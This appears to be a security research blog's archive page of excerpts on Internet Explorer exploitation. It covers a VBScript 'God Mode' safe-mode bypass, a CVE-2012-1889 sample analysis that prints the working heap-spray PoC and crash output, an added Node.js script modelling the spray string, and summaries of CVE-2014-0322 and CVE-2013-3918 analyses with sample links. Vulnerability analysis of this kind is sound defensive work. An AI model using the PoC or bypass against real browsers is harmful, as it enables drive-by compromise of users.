Tag Archives » IE

How to use VBScript to turn on the God Mode?

What is God Mode? The concept comes from yuange: once God Mode is turned on, we can do anything we want. And what is God Mode really? When script code running in the browser tries to create an object such as Shell.Application, the script engine checks the SafeMode flag; if it is set, the creation is blocked. Clearing that check is what God Mode means. Yuange also calls this DVE (Data Virtual Execution): it only executes script, not native code, so ASLR, DEP, EMET and CFI all fail to stop it. What we are going to do is clear the SafeMode flag. (Notice: all the following code is …..

CVE-2012-1889 exploit sample analysis

Hi, this is an IE exploit sample I found on VirusTotal: https://www.virustotal.com/en/file/1df80150284800e82b1dd64579aae71ebce2f6fd44ea37e4c83af287502452ee/analysis/ Its detection ratio is very low, 12 / 51; many vendors cannot detect this sample. From the VT tag it appears to be CVE-2012-1889, which is really an old vulnerability. The exploit code is also available here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/msxml_get_definition_code_exec.rb Now let's look through this sample. The PoC code is as follows:

<script type="text/javascript">// <![CDATA[
var obj=document.getElementById('puZz').object;
var src=unescape("%"+"u0c08"+"%"+"u0c0c");
while(src.length<0x1002)src+=src;
src="\\\\xxx"+src;
src=src.substr(0,0x1000-10);
var pic=document.createElement("img");
pic.src=src;
pic.nameProp;
obj['definition'](1000);
// ]]></script>

Now we load the PoC in IE. It crashes:

(90c.76c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=0c0c0c08 ebx=00000000 ecx=5dda5dfc …..
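The following is an added example, not code from the original post or the sample: it rebuilds the PoC's spray string with the same doubling loop, prefix and substr, then views it as the UTF-16LE bytes IE keeps in memory and reads 32-bit values out of it, so the eax value in the crash above can be related to the spray pattern. It assumes Node.js (Buffer is used for the byte view); the function names are this example's own.

```javascript
// Added example, not code from the original post: it only models the
// sample's spray string so the crash register value can be related to it.
// Assumes Node.js (Buffer is used for the UTF-16LE byte view).

// Build the string exactly as the PoC does. unescape("%u0c08%u0c0c") yields
// the two UTF-16 code units 0x0c08 and 0x0c0c; fromCharCode is used here so
// the example does not rely on the legacy unescape global.
function buildSprayString() {
  let src = String.fromCharCode(0x0c08, 0x0c0c);
  while (src.length < 0x1002) src += src; // doubles 2 -> 4 -> ... -> 8192
  src = "\\\\xxx" + src;                   // five leading chars: \ \ x x x
  return src.substr(0, 0x1000 - 10);       // 4086 UTF-16 code units
}

// A JS string / BSTR in IE is stored as UTF-16LE, two bytes per code unit.
function toUtf16le(s) {
  return Buffer.from(s, "utf16le");
}

// Little-endian 32-bit read at byte offset `off`, as the CPU would do it.
function dwordAt(buf, off) {
  return buf.readUInt32LE(off);
}

// Byte offset where the repeated pattern begins (after "\\xxx" = 5 units).
const PATTERN_START = 5 * 2;

// Report the dwords a consumer of this buffer sees depending on whether it
// reads at a 4-byte-aligned or a 2-byte-shifted position in the pattern.
// The byte sequence repeats every 4 bytes: 08 0c 0c 0c.
function spraySummary() {
  const s = buildSprayString();
  const buf = toUtf16le(s);
  return {
    units: s.length,                           // 4086
    bytes: buf.length,                         // 8172
    aligned: dwordAt(buf, PATTERN_START),      // 0x0c0c0c08
    shifted: dwordAt(buf, PATTERN_START + 2),  // 0x0c080c0c
  };
}

if (typeof require !== "undefined" && require.main === module) {
  const r = spraySummary();
  console.log(`string: ${r.units} units, ${r.bytes} bytes`);
  console.log(`aligned read: 0x${r.aligned.toString(16)}`);
  console.log(`shifted read: 0x${r.shifted.toString(16)}`);
}
```

An aligned read anywhere inside the pattern returns 0x0c0c0c08, which is the eax value in the crash output above; a read shifted by one code unit returns 0x0c080c0c instead. Both values land in the same sprayed region, which is why the two-unit pattern works regardless of where the uninitialised pointer happens to point.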

The Art of Leaks: The Return of Heap Feng Shui(demo code)

Thanks to ga1ois for giving an excellent lecture on the Art of Leaks at CanSecWest. He found a way to read/write any memory of the process. Cool! I have uploaded the PPT here: The+Art+of+Leaks+-+read+version+-+Yoyo. You can also download the PPT from his GitHub: https://github.com/ga1ois/CanSecWest2014/blob/master/The Art of Leaks – read version – Yoyo.pdf Now I write some demo code here

CVE-2014-0322 0day root cause analysis

Yesterday, FireEye posted a blog about a new 0day attack. (http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html) (http://www.fireeye.com/blog/uncategorized/2014/02/operation-snowman-deputydog-actor-compromises-us-veterans-of-foreign-wars-website.html). This 0day affects IE 10, has been assigned CVE-2014-0322, and can be used in APT attacks. We can find the sample here: http://jsunpack.jeek.org/?report=a7d85dd462456a816b1ebc8306550e0c9b61c75e

CVE-2013-3918 exploit analysis

Last month, FireEye caught a 0day attack, to which MS assigned CVE-2013-3918. This 0day may have been in the wild for more than one year. We can find the sample here: http://jsunpack.jeek.org/?report=0fe86b1a6fc27dbd4134d96e68b9153682cc6831. Metasploit has also released a module which works on WinXP + IE8. Now I will give a deep analysis of this vulnerability.